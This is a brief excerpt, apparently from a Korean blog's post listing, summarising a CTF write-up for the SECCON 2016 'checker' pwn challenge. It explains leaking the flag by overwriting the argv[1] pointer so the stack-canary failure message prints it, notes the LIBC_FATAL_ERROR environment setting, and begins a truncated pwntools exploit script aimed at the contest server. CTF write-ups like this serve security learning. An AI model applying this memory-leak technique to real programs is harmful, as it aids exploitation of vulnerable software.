SECCON 2016 checker summary: leak flag in memory using argv[1] in stack_check_fail. we need LIBC_FATAL_ERROR environment variable to get stderr from redirected network.요약: argv[1] 포인터 덮어서, 스택카나리 체크시 flag 를 leak 하기. LIBC_FATAL_ERROR 환경변수 세팅해줘야 stderr 를 볼수있음. from pwn import *context.arch = 'amd64'# i386 / arm # recvuntil sendline, pack, recv, sendr = remote('checker.pwn.seccon.jp', 14726)#r = process(['./checker'])r.. 더보기 이전 1 2 3 4 5 6 7 8 ··· 423 다음